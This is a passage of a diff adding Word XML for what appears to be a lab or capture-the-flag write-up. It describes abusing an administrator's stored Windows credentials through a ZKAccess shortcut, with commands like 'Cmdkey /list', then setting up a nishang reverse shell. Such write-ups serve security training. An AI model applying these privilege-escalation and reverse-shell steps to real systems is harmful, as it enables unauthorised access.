+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
+                  <wp:extent cx="4486275" cy="2686050"/>
+                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
+                  <wp:docPr id="9" name="image11.png"/>
+                  <a:graphic>
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic>
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="image11.png"/>
+                          <pic:cNvPicPr preferRelativeResize="0"/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId26"/>
+                          <a:srcRect b="0" l="0" r="0" t="0"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4486275" cy="2686050"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect"/>
+                          <a:ln/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dir -force</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Here we find yet another reference to ZKAccess, but this time it is a “lnk” file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Table19"/>
+        <w:tblW w:w="9360.0" w:type="dxa"/>
+        <w:jc w:val="center"/>
+        <w:tblBorders>
+          <w:top w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:left w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:bottom w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:right w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideH w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideV w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+        <w:tblGridChange w:id="0">
+          <w:tblGrid>
+            <w:gridCol w:w="9360"/>
+          </w:tblGrid>
+        </w:tblGridChange>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="0"/>
+          <w:tblHeader w:val="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:shd w:fill="auto" w:val="clear"/>
+            <w:tcMar>
+              <w:top w:w="100.0" w:type="dxa"/>
+              <w:left w:w="100.0" w:type="dxa"/>
+              <w:bottom w:w="100.0" w:type="dxa"/>
+              <w:right w:w="100.0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="top"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
+                  <wp:extent cx="5810250" cy="1397000"/>
+                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
+                  <wp:docPr id="11" name="image13.png"/>
+                  <a:graphic>
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic>
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="image13.png"/>
+                          <pic:cNvPicPr preferRelativeResize="0"/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId27"/>
+                          <a:srcRect b="0" l="0" r="0" t="0"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5810250" cy="1397000"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect"/>
+                          <a:ln/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If we use “type” on this file, we see what appears to be the administrator user running this link to Access.exe. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This springs the idea that the administrator’s credentials may be stored and we can abuse this to run whatever executable we desire. Checking this, we see this is true.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Table20"/>
+        <w:tblW w:w="9360.0" w:type="dxa"/>
+        <w:jc w:val="center"/>
+        <w:tblBorders>
+          <w:top w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:left w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:bottom w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:right w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideH w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideV w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+        <w:tblGridChange w:id="0">
+          <w:tblGrid>
+            <w:gridCol w:w="9360"/>
+          </w:tblGrid>
+        </w:tblGridChange>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="0"/>
+          <w:tblHeader w:val="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:shd w:fill="auto" w:val="clear"/>
+            <w:tcMar>
+              <w:top w:w="100.0" w:type="dxa"/>
+              <w:left w:w="100.0" w:type="dxa"/>
+              <w:bottom w:w="100.0" w:type="dxa"/>
+              <w:right w:w="100.0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="top"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
+                  <wp:extent cx="4057650" cy="1209675"/>
+                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
+                  <wp:docPr id="4" name="image10.png"/>
+                  <a:graphic>
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic>
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="image10.png"/>
+                          <pic:cNvPicPr preferRelativeResize="0"/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId28"/>
+                          <a:srcRect b="0" l="0" r="0" t="0"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4057650" cy="1209675"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect"/>
+                          <a:ln/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cmdkey /list</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We could have also found the above information if we ran a tool such as WinPEAS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We grab a script from nishang and set it up to form a reverse shell back to us.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Table21"/>
+        <w:tblW w:w="9360.0" w:type="dxa"/>
+        <w:jc w:val="center"/>
+        <w:tblBorders>
+          <w:top w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:left w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:bottom w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:right w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideH w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideV w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+        <w:tblGridChange w:id="0">
+          <w:tblGrid>
+            <w:gridCol w:w="9360"/>
+          </w:tblGrid>
+        </w:tblGridChange>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="0"/>
+          <w:tblHeader w:val="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:shd w:fill="auto" w:val="clear"/>
+            <w:tcMar>
+              <w:top w:w="100.0" w:type="dxa"/>
+              <w:left w:w="100.0" w:type="dxa"/>
+              <w:bottom w:w="100.0" w:type="dxa"/>
+              <w:right w:w="100.0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="top"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
+                  <wp:extent cx="5810250" cy="190500"/>
+                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
+                  <wp:docPr id="16" name="image17.png"/>
+                  <a:graphic>
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic>
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="image17.png"/>
+                          <pic:cNvPicPr preferRelativeResize="0"/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId29"/>
+                          <a:srcRect b="0" l="0" r="0" t="0"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5810250" cy="190500"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect"/>
+                          <a:ln/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
